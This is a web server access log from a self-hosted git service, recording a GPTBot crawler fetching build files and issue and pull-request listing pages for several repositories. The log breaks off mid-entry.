"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 